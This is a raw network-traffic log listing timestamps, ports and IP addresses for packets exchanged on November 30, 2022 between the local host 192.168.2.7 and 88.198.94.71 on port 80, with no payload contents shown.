Nov 30, 2022 00:10:05.120369911 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.120393991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.120415926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.120436907 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.120449066 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.120476007 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.120476007 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.121289968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.121330023 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.121359110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.121359110 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.121392012 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.121412992 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.124895096 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.124917030 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.124941111 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.124993086 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125051022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125257015 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125277042 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125298023 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125314951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125330925 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125335932 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125348091 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125365973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125381947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125386953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125416994 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125427008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125446081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125463009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125469923 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125479937 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125504971 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125507116 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125523090 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125535965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125540018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125565052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125593901 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125612020 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125617027 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125617027 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125627995 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125633001 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125647068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125663996 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125696898 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.125758886 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125778913 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.125807047 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.126183033 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126203060 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126233101 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.126264095 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126283884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126307011 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126310110 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.126327038 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126351118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126351118 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.126369953 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126388073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.126498938 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.126688957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126709938 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126733065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126753092 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126774073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.126821995 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.126856089 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126933098 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126959085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126977921 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.126996040 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.126996040 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127016068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127026081 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127034903 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127047062 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127054930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127073050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127079010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127091885 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127110958 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127124071 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127130032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127144098 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127150059 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127170086 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127186060 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127211094 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127230883 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127254963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127259016 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127274990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127294064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127294064 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127314091 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127321959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127334118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127341986 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127352953 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127367020 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127372026 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127384901 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127392054 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127401114 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127412081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127415895 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127433062 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127443075 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127461910 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127485037 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127487898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127518892 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127620935 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127621889 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127640963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127660990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127693892 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127713919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127728939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127732038 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127752066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127769947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127783060 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127784014 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127814054 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127825022 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127844095 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127862930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127867937 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127882004 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127901077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127911091 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127919912 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127931118 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.127938032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.127969027 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128009081 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128101110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128122091 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128139973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128180981 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128227949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128247976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128248930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128281116 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128298998 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128302097 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128303051 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128362894 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128365040 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128384113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128437042 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128448963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128448963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128457069 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128475904 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128488064 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128495932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128505945 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128515005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128525019 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128545046 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128633976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128658056 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128679037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128698111 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128716946 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128717899 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128736973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128741980 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128756046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128774881 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128788948 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128794909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128812075 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128814936 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128834963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128844023 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128854036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128874063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128880024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128892899 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128902912 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128912926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128921986 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128931999 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.128951073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128998995 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.128998995 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129329920 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129349947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129374027 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129391909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129411936 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129415035 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129431009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129450083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129456997 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129475117 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129643917 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129654884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129674911 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129693985 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129713058 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129740953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129760981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129781008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129786968 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129800081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129818916 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129842997 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129846096 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129862070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129868031 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129882097 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129890919 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129900932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129920959 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129923105 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129940033 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129940987 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129961967 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.129971027 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129991055 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.129997015 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130008936 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130023003 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130028009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130048037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130048990 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130068064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130085945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130091906 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130103111 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130103111 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130120039 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130286932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130289078 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130306959 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130331993 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130351067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130368948 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130371094 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130390882 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130409002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130414963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130433083 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130470037 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130470037 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130573034 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130593061 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130611897 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130630970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130635977 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130647898 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130650997 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130670071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130685091 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130685091 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130688906 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130708933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130721092 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130732059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130762100 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130762100 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.130901098 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130919933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130938053 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130955935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130975008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.130994081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131026030 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131026030 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131041050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131217003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131263018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131282091 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131302118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131314993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131320953 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131340981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131359100 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131377935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131432056 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131561041 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131581068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131607056 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131611109 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131628036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131633997 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131647110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131665945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131669044 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131685019 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.131697893 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131716967 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.131794930 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132014990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132034063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132052898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132071972 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132090092 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132119894 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132122040 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132139921 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132158995 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132180929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132195950 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132285118 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132375956 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132395029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132420063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132440090 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132452965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132458925 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132469893 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132478952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132497072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132498980 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132515907 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132534981 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132534981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132555008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132571936 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132572889 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132591963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132601976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132611990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132622004 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132652998 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.132786989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.132930994 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.133071899 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133095980 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.133121967 CET	80	49708	88.198.94.71	192.168.2.7
